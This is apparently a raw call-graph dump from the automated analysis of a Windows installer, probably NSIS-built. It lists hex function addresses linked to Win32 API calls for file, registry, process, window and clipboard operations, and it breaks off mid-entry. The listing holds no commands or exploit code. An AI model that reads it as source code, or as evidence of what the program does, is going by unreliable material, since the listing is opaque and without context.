4306 40616a CloseHandle 4304->4306 4320 405f25 ReadFile 4305->4320 4306->4294 4311 4060f4 lstrcpyA 4314 406116 4311->4314 4312 406108 4313 405e07 4 API calls 4312->4313 4313->4314 4315 40614d SetFilePointer 4314->4315 4327 405f54 WriteFile 4315->4327 4318->4298 4319->4303 4321 405f43 4320->4321 4321->4306 4322 405e07 lstrlenA 4321->4322 4323 405e48 lstrlenA 4322->4323 4324 405e50 4323->4324 4325 405e21 lstrcmpiA 4323->4325 4324->4311 4324->4312 4325->4324 4326 405e3f CharNextA 4325->4326 4326->4323 4328 405f72 GlobalFree 4327->4328 4328->4306 4329 4015c1 4330 402c37 17 API calls 4329->4330 4331 4015c8 4330->4331 4332 405d2c 4 API calls 4331->4332 4344 4015d1 4332->4344 4333 401631 4335 401663 4333->4335 4336 401636 4333->4336 4334 405cae CharNextW 4334->4344 4339 401423 24 API calls 4335->4339 4356 401423 4336->4356 4346 40165b 4339->4346 4343 40164a SetCurrentDirectoryW 4343->4346 4344->4333 4344->4334 4345 401617 GetFileAttributesW 4344->4345 4348 40597d 4344->4348 4351 4058e3 CreateDirectoryW 4344->4351 4360 405960 CreateDirectoryW 4344->4360 4345->4344 4363 40678a GetModuleHandleA 4348->4363 4352 405930 4351->4352 4353 405934 GetLastError 4351->4353 4352->4344 4353->4352 4354 405943 SetFileSecurityW 4353->4354 4354->4352 4355 405959 GetLastError 4354->4355 4355->4352 4357 405414 24 API calls 4356->4357 4358 401431 4357->4358 4359 4063b0 lstrcpynW 4358->4359 4359->4343 4361 405970 4360->4361 4362 405974 GetLastError 4360->4362 4361->4344 4362->4361 4364 4067b0 GetProcAddress 4363->4364 4365 4067a6 4363->4365 4367 405984 4364->4367 4369 40671a GetSystemDirectoryW 4365->4369 4367->4344 4368 4067ac 4368->4364 4368->4367 4370 40673c wsprintfW LoadLibraryExW 4369->4370 4370->4368 4375 401e43 4383 402c15 4375->4383 4377 401e49 4378 402c15 17 API calls 4377->4378 4379 401e55 4378->4379 4380 401e61 ShowWindow 4379->4380 4381 401e6c EnableWindow 4379->4381 4382 402abf 4380->4382 4381->4382 4384 4063d2 17 API calls 4383->4384 4385 402c2a 4384->4385 4385->4377 4390 402644 4391 402c15 17 API calls 4390->4391 4400 402653 4391->4400 4392 402790 4393 40269d ReadFile 4393->4392 4393->4400 4394 402736 4394->4392 4394->4400 4404 405f83 SetFilePointer 4394->4404 4395 405f25 ReadFile 4395->4400 4397 402792 4413 4062f7 wsprintfW 4397->4413 4398 4026dd MultiByteToWideChar 4398->4400 4400->4392 4400->4393 4400->4394 4400->4395 4400->4397 4400->4398 4401 402703 SetFilePointer MultiByteToWideChar 4400->4401 4402 4027a3 4400->4402 4401->4400 4402->4392 4403 4027c4 SetFilePointer 4402->4403 4403->4392 4405 405f9f 4404->4405 4412 405fbb 4404->4412 4406 405f25 ReadFile 4405->4406 4407 405fab 4406->4407 4408 405fc4 SetFilePointer 4407->4408 4409 405fec SetFilePointer 4407->4409 4407->4412 4408->4409 4410 405fcf 4408->4410 4409->4412 4411 405f54 WriteFile 4410->4411 4411->4412 4412->4394 4413->4392 5107 402348 5108 402c37 17 API calls 5107->5108 5109 402357 5108->5109 5110 402c37 17 API calls 5109->5110 5111 402360 5110->5111 5112 402c37 17 API calls 5111->5112 5113 40236a GetPrivateProfileStringW 5112->5113 5117 4016cc 5118 402c37 17 API calls 5117->5118 5119 4016d2 GetFullPathNameW 5118->5119 5120 4016ec 5119->5120 5126 40170e 5119->5126 5122 4066f3 2 API calls 5120->5122 5120->5126 5121 401723 GetShortPathNameW 5123 402abf 5121->5123 5124 4016fe 5122->5124 5124->5126 5127 4063b0 lstrcpynW 5124->5127 5126->5121 5126->5123 5127->5126 5128 401b4d 5129 402c37 17 API calls 5128->5129 5130 401b54 5129->5130 5131 402c15 17 API calls 5130->5131 5132 401b5d wsprintfW 5131->5132 5133 402abf 5132->5133 5134 4047cd 5135 404803 5134->5135 5136 4047dd 5134->5136 5144 4043ac 5135->5144 5141 404345 5136->5141 5140 4047ea SetDlgItemTextW 5140->5135 5142 4063d2 17 API calls 5141->5142 5143 404350 SetDlgItemTextW 5142->5143 5143->5140 5145 4043c4 GetWindowLongW 5144->5145 5155 40444d 5144->5155 5146 4043d5 5145->5146 5145->5155 5147 4043e4 GetSysColor 5146->5147 5148 4043e7 5146->5148 5147->5148 5149 4043f7 SetBkMode 5148->5149 5150 4043ed SetTextColor 5148->5150 5151 404415 5149->5151 5152 40440f GetSysColor 5149->5152 5150->5149 5153 404426 5151->5153 5154 40441c SetBkColor 5151->5154 5152->5151 5153->5155 5156 404440 CreateBrushIndirect 5153->5156 5157 404439 DeleteObject 5153->5157 5154->5153 5156->5155 5157->5156 5158 401f52 5159 402c37 17 API calls 5158->5159 5160 401f59 5159->5160 5161 4066f3 2 API calls 5160->5161 5162 401f5f 5161->5162 5164 401f70 5162->5164 5165 4062f7 wsprintfW 5162->5165 5165->5164 5166 402253 5167 402c37 17 API calls 5166->5167 5168 402259 5167->5168 5169 402c37 17 API calls 5168->5169 5170 402262 5169->5170 5171 402c37 17 API calls 5170->5171 5172 40226b 5171->5172 5173 4066f3 2 API calls 5172->5173 5174 402274 5173->5174 5175 402285 lstrlenW lstrlenW 5174->5175 5176 402278 5174->5176 5178 405414 24 API calls 5175->5178 5177 405414 24 API calls 5176->5177 5180 402280 5177->5180 5179 4022c3 SHFileOperationW 5178->5179 5179->5176 5179->5180 5181 405553 5182 405574 GetDlgItem GetDlgItem GetDlgItem 5181->5182 5183 4056fd 5181->5183 5226 40437a SendMessageW 5182->5226 5185 405706 GetDlgItem CreateThread CloseHandle 5183->5185 5186 40572e 5183->5186 5185->5186 5188 405759 5186->5188 5189 405745 ShowWindow ShowWindow 5186->5189 5190 40577e 5186->5190 5187 4055e4 5192 4055eb GetClientRect GetSystemMetrics SendMessageW SendMessageW 5187->5192 5191 4057b9 5188->5191 5194 405793 ShowWindow 5188->5194 5195 40576d 5188->5195 5228 40437a SendMessageW 5189->5228 5196 4043ac 8 API calls 5190->5196 5191->5190 5201 4057c7 SendMessageW 5191->5201 5199 405659 5192->5199 5200 40563d SendMessageW SendMessageW 5192->5200 5197 4057b3 5194->5197 5198 4057a5 5194->5198 5229 40431e 5195->5229 5203 40578c 5196->5203 5205 40431e SendMessageW 5197->5205 5204 405414 24 API calls 5198->5204 5206 40566c 5199->5206 5207 40565e SendMessageW 5199->5207 5200->5199 5201->5203 5208 4057e0 CreatePopupMenu 5201->5208 5204->5197 5205->5191 5210 404345 18 API calls 5206->5210 5207->5206 5209 4063d2 17 API calls 5208->5209 5211 4057f0 AppendMenuW 5209->5211 5212 40567c 5210->5212 5213 405820 TrackPopupMenu 5211->5213 5214 40580d GetWindowRect 5211->5214 5215 405685 ShowWindow 5212->5215 5216 4056b9 GetDlgItem SendMessageW 5212->5216 5213->5203 5218 40583b 5213->5218 5214->5213 5219 4056a8 5215->5219 5220 40569b ShowWindow 5215->5220 5216->5203 5217 4056e0 SendMessageW SendMessageW 5216->5217 5217->5203 5221 405857 SendMessageW 5218->5221 5227 40437a SendMessageW 5219->5227 5220->5219 5221->5221 5222 405874 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5221->5222 5224 405899 SendMessageW 5222->5224 5224->5224 5225 4058c2 GlobalUnlock SetClipboardData CloseClipboard 5224->5225 5225->5203 5226->5187 5227->5216 5228->5188 5230 404325 5229->5230 5231 40432b SendMessageW 5229->5231 5230->5231 5231->5190 5232 401956 5233 402c37 17 API calls 5232->5233 5234 40195d lstrlenW 5233->5234 5235 40258c 5234->5235 5038 4014d7 5039 402c15 17 API calls 5038->5039 5040 4014dd Sleep 5039->5040 5042 402abf 5040->5042 5236 401d57 GetDlgItem GetClientRect 5237 402c37 17 API calls 5236->5237 5238 401d89 LoadImageW SendMessageW 5237->5238 5239 401da7 DeleteObject 5238->5239 5240 402abf 5238->5240 5239->5240 5241 4022d7 5242 4022f1 5241->5242 5243 4022de 5241->5243 5244 4063d2 17 API calls 5243->5244 5245 4022eb 5244->5245 5246 405a12 MessageBoxIndirectW 5245->5246 5246->5242 5247 402dd7 5248 402e02 5247->5248 5249 402de9 SetTimer 5247->5249 5250 402e50 5248->5250 5251 402e56 MulDiv 5248->5251 5249->5248 5252 402e10 wsprintfW SetWindowTextW SetDlgItemTextW 5251->5252 5252->5250 5254 404459 lstrcpynW lstrlenW 5043 40175c 5044 402c37 17 API calls 5043->5044 5045 401763 5044->5045 5046 405ed1 2 API calls 5045->5046 5047 40176a 5046->5047 5048 405ed1 2 API calls 5047->5048 5048->5047 5061 4023de 5062 402c37 17 API calls 5061->5062 5063 4023f0 5062->5063 5064 402c37 17 API calls 5063->5064 5065 4023fa 5064->5065 5078 402cc7 5065->5078 5068 402432 5071 402c15 17 API calls 5068->5071 5073 40243e 5068->5073 5069 402885 5070 402c37 17 API calls 5074 402428 lstrlenW 5070->5074 5071->5073 5072 40245d RegSetValueExW 5076 402473 RegCloseKey 5072->5076 5073->5072 5075 4031ba 44 API calls 5073->5075 5074->5068 5075->5072 5076->5069 5079 402ce2 5078->5079 5082 40624b 5079->5082 5083 40625a 5082->5083 5084 40240a 5083->5084 5085 406265 RegCreateKeyExW 5083->5085 5084->5068 5084->5069 5084->5070 5085->5084 5262 402862 5263 402c37 17 API calls 5262->5263 5264 402869 FindFirstFileW 5263->5264 5265 402891 5264->5265 5269 40287c 5264->5269 5270 4062f7 wsprintfW 5265->5270 5267 40289a 5271 4063b0 lstrcpynW 5267->5271 5270->5267 5271->5269 5272 4044e2 5273 4044fa 5272->5273 5280 404614 5272->5280 5277 404345 18 API calls 5273->5277 5274 40467e 5275 404748 5274->5275 5276 404688 GetDlgItem 5274->5276 5282 4043ac 8 API calls 5275->5282 5278 4046a2 5276->5278 5279 404709 5276->5279 5281 404561 5277->5281 5278->5279 5286 4046c8 SendMessageW LoadCursorW SetCursor 5278->5286 5279->5275 5287 40471b 5279->5287 5280->5274 5280->5275 5283 40464f GetDlgItem SendMessageW 5280->5283 5285 404345 18 API calls 5281->5285 5296 404743 5282->5296 5305 404367 EnableWindow 5283->5305 5289 40456e CheckDlgButton 5285->5289 5309 404791 5286->5309 5291 404731 5287->5291 5292 404721 SendMessageW 5287->5292 5288 404679 5306 40476d 5288->5306 5303 404367 EnableWindow 5289->5303 5291->5296 5297 404737 SendMessageW 5291->5297 5292->5291 5297->5296 5298 40458c GetDlgItem 5304 40437a SendMessageW 5298->5304 5300 4045a2 SendMessageW 5301 4045c8 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5300->5301 5302 4045bf GetSysColor 5300->5302 5301->5296 5302->5301 5303->5298 5304->5300 5305->5288 5307 404780 SendMessageW 5306->5307 5308 40477b 5306->5308 5307->5274 5308->5307 5312 4059d8 ShellExecuteExW 5309->5312 5311 4046f7 LoadCursorW SetCursor 5311->5279 5312->5311 5313 401563 5314 402a65 5313->5314 5317 4062f7 wsprintfW 5314->5317 5316 402a6a 5317->5316 5318 401968 5319 402c15 17 API calls 5318->5319 5320 40196f 5319->5320 5321 402c15 17 API calls 5320->5321 5322 40197c 5321->5322 5323 402c37 17 API calls 5322->5323 5324 401993 lstrlenW 5323->5324 5325 4019a4 5324->5325 5326 4019e5 5325->5326 5330 4063b0 lstrcpynW 5325->5330 5328 4019d5 5328->5326 5329 4019da lstrlenW 5328->5329 5329->5326 5330->5328 4458 4027e9 4459 4027f0 4458->4459 4461 402a6a 4458->4461 4460 402c15 17 API calls 4459->4460 4462 4027f7 4460->4462 4463 402806 SetFilePointer 4462->4463 4463->4461 4464 402816 4463->4464 4466 4062f7 wsprintfW 4464->4466 4466->4461 5331 100018a9 5333 100018cc 5331->5333 5332 10001911 5335 10001272 2 API calls 5332->5335 5333->5332 5334 100018ff GlobalFree 5333->5334 5334->5332 5336 10001a87 GlobalFree GlobalFree 5335->5336 5337 40166a 5338 402c37 17 API calls 5337->5338 5339 401670 5338->5339 5340 4066f3 2 API calls 5339->5340 5341 401676 5340->5341 5342 404b6a 5343 404b96 5342->5343 5344 404b7a 5342->5344 5346 404bc9 5343->5346 5347 404b9c SHGetPathFromIDListW 5343->5347 5353 4059f6 GetDlgItemTextW 5344->5353 5349 404bac 5347->5349 5352 404bb3 SendMessageW 5347->5352 5348 404b87 SendMessageW 5348->5343 5351 40140b 2 API calls 5349->5351 5351->5352 5352->5346 5353->5348 5354 403e6c 5355 403e84 5354->5355 5356 403fbf 5354->5356 5355->5356 5357 403e90 5355->5357 5358 403fd0 GetDlgItem GetDlgItem 5356->5358 5359 404010 5356->5359 5362 403e9b SetWindowPos 5357->5362 5363 403eae 5357->5363 5360 404345 18 API calls 5358->5360 5361 40406a 5359->5361 5371 401389 2 API calls 5359->5371 5366 403ffa SetClassLongW 5360->5366 5367 404391 SendMessageW 5361->5367 5385 403fba 5361->5385 5362->5363 5364 403eb3 ShowWindow 5363->5364 5365 403ecb 5363->5365 5364->5365 5368 403ed3 DestroyWindow 5365->5368 5369 403eed 5365->5369 5370 40140b 2 API calls 5366->5370 5395 40407c 5367->5395 5422 4042ce 5368->5422 5372 403ef2 SetWindowLongW 5369->5372 5373 403f03 5369->5373 5370->5359 5374 404042 5371->5374 5372->5385 5376 403f7a 5373->5376 5377 403f0f GetDlgItem 5373->5377 5374->5361 5378 404046 SendMessageW 5374->5378 5375 4042d0 DestroyWindow EndDialog 5375->5422 5383 4043ac 8 API calls 5376->5383 5381 403f22 SendMessageW IsWindowEnabled 5377->5381 5382 403f3f 5377->5382 5378->5385 5379 40140b 2 API calls 5379->5395 5380 4042ff ShowWindow 5380->5385 5381->5382 5381->5385 5386 403f4c 5382->5386 5388 403f93 SendMessageW 5382->5388 5389 403f5f 5382->5389 5396 403f44 5382->5396 5383->5385 5384 4063d2 17 API calls 5384->5395 5386->5388 5386->5396 5387 40431e SendMessageW 5387->5376 5388->5376 5390 403f67 5389->5390 5391 403f7c 5389->5391 5392 40140b 2 API calls 5390->5392 5394 40140b 2 API calls 5391->5394 5392->5396 5393 404345 18 API calls 5393->5395 5394->5396 5395->5375 5395->5379 5395->5384 5395->5385 5395->5393 5397 404345 18 API calls 5395->5397 5413 404210 DestroyWindow 5395->5413 5396->5376 5396->5387 5398 4040f7 GetDlgItem 5397->5398 5399 404114 ShowWindow EnableWindow 5398->5399 5400 40410c 5398->5400 5423 404367 EnableWindow 5399->5423 5400->5399 5402 40413e EnableWindow 5407 404152 5402->5407 5403 404157 GetSystemMenu EnableMenuItem SendMessageW 5404 404187 SendMessageW 5403->5404 5403->5407 5404->5407 5406 403e4d 18 API calls 5406->5407 5407->5403 5407->5406 5424 40437a SendMessageW 5407->5424 5425 4063b0 lstrcpynW 5407->5425 5409 4041b6 lstrlenW 5410 4063d2 17 API calls 5409->5410 5411 4041cc SetWindowTextW 5410->5411 5412 401389 2 API calls 5411->5412 5412->5395 5414 40422a CreateDialogParamW 5413->5414 5413->5422 5415 40425d 5414->5415 5414->5422 5416 404345 18 API calls 5415->5416 5417 404268 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5416->5417 5418 401389 2 API calls 5417->5418 5419 4042ae 5418->5419 5419->5385 5420 4042b6 ShowWindow 5419->5420 5421 404391 SendMessageW 5420->5421 5421->5422 5422->5380 5422->5385 5423->5402 5424->5407 5425->5409 5426 401ced 5427 402c15 17 API calls 5426->5427 5428 401cf3 IsWindow 5427->5428 5429 401a20 5428->5429 4962 40176f 4963 402c37 17 API calls 4962->4963 4964 401776 4963->4964 4965 401796 4964->4965 4966 40179e 4964->4966 5002 4063b0 lstrcpynW 4965->5002 5003 4063b0 lstrcpynW 4966->5003 4969 40179c 4973 406644 5 API calls 4969->4973 4970 4017a9 4971 405c81 3 API calls 4970->4971 4972 4017af lstrcatW 4971->4972 4972->4969 4978 4017bb 4973->4978 4974 4066f3 2 API calls 4974->4978 4975 4017f7 4976 405e7d 2 API calls 4975->4976 4976->4978 4978->4974 4978->4975 4979 4017cd CompareFileTime 4978->4979 4980 40188d 4978->4980 4987 4063d2 17 API calls 4978->4987 4992 4063b0 lstrcpynW 4978->4992 4997 405a12 MessageBoxIndirectW 4978->4997 4998 401864 4978->4998 5001 405ea2 GetFileAttributesW CreateFileW 4978->5001 4979->4978 4981 405414 24 API calls 4980->4981 4983 401897 4981->4983 4982 405414 24 API calls 5000 401879 4982->5000 4984 4031ba 44 API calls 4983->4984 4985 4018aa 4984->4985 4986 4018be SetFileTime 4985->4986 4988 4018d0 CloseHandle 4985->4988 4986->4988 4987->4978 4989 4018e1 4988->4989 4988->5000 4990 4018e6 4989->4990 4991 4018f9 4989->4991 4993 4063d2 17 API calls 4990->4993 4994 4063d2 17 API calls 4991->4994 4992->4978 4995 4018ee lstrcatW 4993->4995 4996 401901 4994->4996 4995->4996 4999 405a12 MessageBoxIndirectW 4996->4999 4997->4978 4998->4982 4998->5000 4999->5000 5001->4978 5002->4969 5003->4970 5437 402570 5438 402c37 17 API calls 5437->5438 5439 402577 5438->5439 5442 405ea2 GetFileAttributesW CreateFileW 5439->5442 5441 402583 5442->5441 5004 401b71 5005 401bc2 5004->5005 5006 401b7e 5004->5006 5008 401bc7 5005->5008 5009 401bec GlobalAlloc 5005->5009 5007 401c07 5006->5007 5012 401b95 5006->5012 5010 4063d2 17 API calls 5007->5010 5022 4022f1 5007->5022 5008->5022 5025 4063b0 lstrcpynW 5008->5025 5011 4063d2 17 API calls 5009->5011 5014 4022eb 5010->5014 5011->5007 5023 4063b0 lstrcpynW 5012->5023 5018 405a12 MessageBoxIndirectW 5014->5018 5016 401bd9 GlobalFree 5016->5022 5017 401ba4 5024 4063b0 lstrcpynW 5017->5024 5018->5022 5020 401bb3 5026 4063b0 lstrcpynW 5020->5026 5023->5017 5024->5020 5025->5016 5026->5022 5027 4024f2 5028 402c77 17 API calls 5027->5028 5029 4024fc 5028->5029 5030 402c15 17 API calls 5029->5030 5031 402505 5030->5031 5032 402521 RegEnumKeyW 5031->5032 5033 40252d RegEnumValueW 5031->5033 5036 402885 5031->5036 5034 402549 RegCloseKey 5032->5034 5033->5034 5035 402542 5033->5035 5034->5036 5035->5034 5450 401a72 5451 402c15 17 API calls 5450->5451 5452 401a78 5451->5452 5453 402c15 17 API calls 5452->5453 5454 401a20 5453->5454 5455 401573 5456 401583 ShowWindow 5455->5456 5457 40158c 5455->5457 5456->5457 5458 40159a ShowWindow 5457->5458 5459 402abf 5457->5459 5458->5459 5460 4014f5 SetForegroundWindow 5461 402abf 5460->5461 5462 100016b6 5463 100016e5 5462->5463 5464 10001b18 22 API calls 5463->5464 5465 100016ec 5464->5465 5466 100016f3 5465->5466 5467 100016ff 5465->5467 5468 10001272 2 API calls 5466->5468 5469 10001726 5467->5469 5470 10001709 5467->5470 5478 100016fd 5468->5478 5472 10001750 5469->5472 5473 1000172c 5469->5473 5471 1000153d 3 API calls 5470->5471 5475 1000170e 5471->5475 5474 1000153d 3 API calls 5472->5474 5476 100015b4 3 API calls 5473->5476 5474->5478 5479 100015b4 3 API calls 5475->5479 5477 10001731 5476->5477 5480 10001272 2 API calls 5477->5480 5481 10001714 5479->5481 5482 10001737 GlobalFree 5480->5482 5483 10001272 2 API calls 5481->5483 5482->5478 5484 1000174b GlobalFree 5482->5484 5485 1000171a GlobalFree 5483->5485 5484->5478 5485->5478 5486 401e77 5487 402c37 17 API calls 5486->5487 5488 401e7d 5487->5488 5489 402c37 17 API calls 5488->5489 5490 401e86 5489->5490 5491 402c37 17 API calls 5490->5491 5492 401e8f 5491->5492 5493 402c37 17 API calls 5492->5493 5494 401e98 5493->5494 5495 401423 24 API calls 5494->5495 5496 401e9f 5495->5496 5503 4059d8 ShellExecuteExW 5496->5503 5498 401ee1 5499 40683b 5 API calls 5498->5499 5501 402885 5498->5501 5500 401efb CloseHandle 5499->5500 5500->5501 5503->5498 5504 406e77 5508 40693e 5504->5508 5505 4072a9 5506 4069c8 GlobalAlloc 5506->5505 5506->5508 5507 4069bf GlobalFree 5507->5506 5508->5505 5508->5506 5508->5507 5508->5508 5509 406a36 GlobalFree 5508->5509 5510 406a3f GlobalAlloc 5508->5510 5509->5510 5510->5505 5510->5508 5511 10002238 5512 10002296 5511->5512 5513 100022cc 5511->5513 5512->5513 5514 100022a8 GlobalAlloc 5512->5514 5514->5512 5515 40167b 5516 402c37 17 API calls 5515->5516 5517 401682 5516->5517 5518 402c37 17 API calls 5517->5518 5519 40168b 5518->5519 5520 402c37 17 API calls 5519->5520 5521 401694 MoveFileW 5520->5521 5522 4016a7 5521->5522 5528 4016a0 5521->5528 5523 40224a 5522->5523 5524 4066f3 2 API calls 5522->5524 5526 4016b6 5524->5526 5525 401423 24 API calls 5525->5523 5526->5523 5527 406176 36 API calls 5526->5527 5527->5528 5528->5525 5529 403a7c 5530 403a87 5529->5530 5531 403a8b 5530->5531 5532 403a8e GlobalAlloc 5530->5532 5532->5531 5533 1000103d 5534 1000101b 5 API calls 5533->5534 5535 10001056 5534->5535 5049 40247e 5050 402c77 17 API calls 5049->5050 5051 402488 5050->5051 5052 402c37 17 API calls 5051->5052 5053 402491 5052->5053 5054 40249c RegQueryValueExW 5053->5054 5058 402885 5053->5058 5055 4024c2 RegCloseKey 5054->5055 5056 4024bc 5054->5056 5055->5058 5056->5055 5060 4062f7 wsprintfW 5056->5060 5060->5055 5536 4020fe 5537 402c37 17 API calls 5536->5537 5538 402105 5537->5538 5539 402c37 17 API calls 5538->5539 5540 40210f 5539->5540 5541 402c37 17 API calls 5540->5541 5542 402119 5541->5542 5543 402c37 17 API calls 5542->5543 5544 402123 5543->5544 5545 402c37 17 API calls 5544->5545 5546 40212d 5545->5546 5547 40216c CoCreateInstance 5546->5547 5548 402c37 17 API calls 5546->5548 5551 40218b 5547->5551 5548->5547 5549 401423 24 API calls 5550 40224a 5549->5550 5551->5549 5551->5550 5552 4019ff 5553 402c37 17 API calls 5552->5553 5554 401a06 5553->5554 5555 402c37 17 API calls 5554->5555 5556 401a0f 5555->5556 5557 401a16 lstrcmpiW 5556->5557 5558 401a28 lstrcmpW 5556->5558 5559 401a1c 5557->5559 5558->5559 4111 401f00 4126 402c37 4111->4126 4120 401f2b 4122 401f30 4120->4122 4123 401f3b 4120->4123 4121 402885 4151 4062f7 wsprintfW 4122->4151 4125 401f39 CloseHandle 4123->4125 4125->4121 4127 402c43 4126->4127 4152 4063d2 4127->4152 4130 401f06 4132 405414 4130->4132 4133 40542f 4132->4133 4141 401f10 4132->4141 4134 40544b lstrlenW 4133->4134 4135 4063d2 17 API calls 4133->4135 4136 405474 4134->4136 4137 405459 lstrlenW 4134->4137 4135->4134 4139 405487 4136->4139 4140 40547a SetWindowTextW 4136->4140 4138 40546b lstrcatW 4137->4138 4137->4141 4138->4136 4139->4141 4142 40548d SendMessageW SendMessageW SendMessageW 4139->4142 4140->4139 4143 405995 CreateProcessW 4141->4143 4142->4141 4144 401f16 4143->4144 4145 4059c8 CloseHandle 4143->4145 4144->4121 4144->4125 4146 40683b WaitForSingleObject 4144->4146 4145->4144 4147 406855 4146->4147 4148 406867 GetExitCodeProcess 4147->4148 4194 4067c6 4147->4194 4148->4120 4151->4125 4153 4063df 4152->4153 4154 40662a 4153->4154 4157 4065f8 lstrlenW 4153->4157 4158 4063d2 10 API calls 4153->4158 4161 40650d GetSystemDirectoryW 4153->4161 4163 406520 GetWindowsDirectoryW 4153->4163 4164 406644 5 API calls 4153->4164 4165 4063d2 10 API calls 4153->4165 4166 40659b lstrcatW 4153->4166 4167 406554 SHGetSpecialFolderLocation 4153->4167 4178 40627e 4153->4178 4183 4062f7 wsprintfW 4153->4183 4184 4063b0 lstrcpynW 4153->4184 4155 402c64 4154->4155 4185 4063b0 lstrcpynW 4154->4185 4155->4130 4169 406644 4155->4169 4157->4153 4158->4157 4161->4153 4163->4153 4164->4153 4165->4153 4166->4153 4167->4153 4168 40656c SHGetPathFromIDListW CoTaskMemFree 4167->4168 4168->4153 4175 406651 4169->4175 4170 4066c7 4171 4066cc CharPrevW 4170->4171 4173 4066ed 4170->4173 4171->4170 4172 4066ba CharNextW 4172->4170 4172->4175 4173->4130 4175->4170 4175->4172 4176 4066a6 CharNextW 4175->4176 4177 4066b5 CharNextW 4175->4177 4190 405cae 4175->4190 4176->4175 4177->4172 4186 40621d 4178->4186 4181 4062b2 RegQueryValueExW RegCloseKey 4182 4062e2 4181->4182 4182->4153 4183->4153 4184->4153 4185->4155 4187 40622c 4186->4187 4188 406230 4187->4188 4189 406235 RegOpenKeyExW 4187->4189 4188->4181 4188->4182 4189->4188 4191 405cb4 4190->4191 4192 405cca 4191->4192 4193 405cbb CharNextW 4191->4193 4192->4175 4193->4191 4195 4067e3 PeekMessageW 4194->4195 4196 4067f3 WaitForSingleObject 4195->4196 4197 4067d9 DispatchMessageW 4195->4197 4196->4147 4197->4195 5560 401000 5561 401037 BeginPaint GetClientRect 5560->5561 5562 40100c DefWindowProcW 5560->5562 5563 4010f3 5561->5563 5565 401179 5562->5565 5566 401073 CreateBrushIndirect FillRect DeleteObject 5563->5566 5567 4010fc 5563->5567 5566->5563 5568 401102 CreateFontIndirectW 5567->5568 5569 401167 EndPaint 5567->5569 5568->5569 5570 401112 6 API calls 5568->5570 5569->5565 5570->5569 4372 100027c2 4373 10002812 4372->4373 4374 100027d2 VirtualProtect 4372->4374 4374->4373 5571 401503 5572 40150b 5571->5572 5574 40151e 5571->5574 5573 402c15 17 API calls 5572->5573 5573->5574 4414 402306 4415 40230e 4414->4415 4418 402314 4414->4418 4416 402c37 17 API calls 4415->4416 4416->4418 4417 402322 4420 402c37 17 API calls 4417->4420 4422 402330 4417->4422 4418->4417 4419 402c37 17 API calls 4418->4419 4419->4417 4420->4422 4421 402c37 17 API calls 4423 402339 WritePrivateProfileStringW 4421->4423 4422->4421 5582 401f86 5583 402c37 17 API calls 5582->5583 5584 401f8d 5583->5584 5585 40678a 5 API calls 5584->5585 5586 401f9c 5585->5586 5587 401fb8 GlobalAlloc 5586->5587 5588 402020 5586->5588 5587->5588 5589 401fcc 5587->5589 5590 40678a 5 API calls 5589->5590 5591 401fd3 5590->5591 5592 40678a 5 API calls 5591->5592 5593 401fdd 5592->5593 5593->5588 5597 4062f7 wsprintfW 5593->5597 5595 402012 5598 4062f7 wsprintfW 5595->5598 5597->5595 5598->5588 4424 402388 4425 402390 4424->4425 4426 4023bb 4424->4426 4440 402c77 4425->4440 4428 402c37 17 API calls 4426->4428 4430 4023c2 4428->4430 4436 402cf5 4430->4436 4431 4023a1 4433 402c37 17 API calls 4431->4433 4435 4023a8 RegDeleteValueW RegCloseKey 4433->4435 4434 4023cf 4435->4434 4437 402d0b 4436->4437 4438 402d21 4437->4438 4445 402d2a 4437->4445 4438->4434 4441 402c37 17 API calls 4440->4441 4442 402c8e 4441->4442 4443 40621d RegOpenKeyExW 4442->4443 4444 402397 4443->4444 4444->4431 4444->4434 4446 40621d RegOpenKeyExW 4445->4446 4447 402d58 4446->4447 4448 402dd0 4447->4448 4453 402d5c 4447->4453 4448->4438 4449 402d7e RegEnumKeyW 4450 402d95 RegCloseKey 4449->4450 4449->4453 4451 40678a 5 API calls 4450->4451 4454 402da5 4451->4454 4452 402db6 RegCloseKey 4452->4448 4453->4449 4453->4450 4453->4452 4455 402d2a 6 API calls 4453->4455 4456 402dc4 RegDeleteKeyW 4454->4456 4457 402da9 4454->4457 4455->4453 4456->4448 4457->4448 5599 405388 5600 405398 5599->5600 5601 4053ac 5599->5601 5602 4053f5 5600->5602 5603 40539e 5600->5603 5604 4053b4 IsWindowVisible 5601->5604 5610 4053cb 5601->5610 5605 4053fa CallWindowProcW 5602->5605 5606 404391 SendMessageW 5603->5606 5604->5602 5607 4053c1 5604->5607 5608 4053a8 5605->5608 5606->5608 5612 404cde SendMessageW 5607->5612 5610->5605 5617 404d5e 5610->5617 5613 404d01 GetMessagePos ScreenToClient SendMessageW 5612->5613 5614 404d3d SendMessageW 5612->5614 5615 404d35 5613->5615 5616 404d3a 5613->5616 5614->5615 5615->5610 5616->5614 5626 4063b0 lstrcpynW 5617->5626 5619 404d71 5627 4062f7 wsprintfW 5619->5627 5621 404d7b 5622 40140b 2 API calls 5621->5622 5623 404d84 5622->5623 5628 4063b0 lstrcpynW 5623->5628 5625 404d8b 5625->5602 5626->5619 5627->5621 5628->5625 4467 403489 SetErrorMode GetVersion 4468 4034c8 4467->4468 4469 4034ce 4467->4469 4470 40678a 5 API calls 4468->4470 4471 40671a 3 API calls 4469->4471 4470->4469 4472 4034e4 lstrlenA 4471->4472 4472->4469 4473 4034f4 4472->4473 4474 40678a 5 API calls 4473->4474 4475 4034fb 4474->4475 4476 40678a 5 API calls 4475->4476 4477 403502 4476->4477 4478 40678a 5 API calls 4477->4478 4479 40350e #17 OleInitialize SHGetFileInfoW 4478->4479 4558 4063b0 lstrcpynW 4479->4558 4482 40355a GetCommandLineW 4559 4063b0 lstrcpynW 4482->4559 4484 40356c GetModuleHandleW 4485 403584 4484->4485 4486 405cae CharNextW 4485->4486 4487 403593 CharNextW 4486->4487 4488 4036bd GetTempPathW 4487->4488 4498 4035ac 4487->4498 4560 403458 4488->4560 4490 4036d5 4491 4036d9 GetWindowsDirectoryW lstrcatW 4490->4491 4492 40372f DeleteFileW 4490->4492 4493 403458 12 API calls 4491->4493 4570 402f14 GetTickCount GetModuleFileNameW 4492->4570 4496 4036f5 4493->4496 4494 405cae CharNextW 4494->4498 4496->4492 4499 4036f9 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4496->4499 4497 403743 4504 4037e6 4497->4504 4508 405cae CharNextW 4497->4508 4553 4037f6 4497->4553 4498->4494 4501 4036a8 4498->4501 4503 4036a6 4498->4503 4502 403458 12 API calls 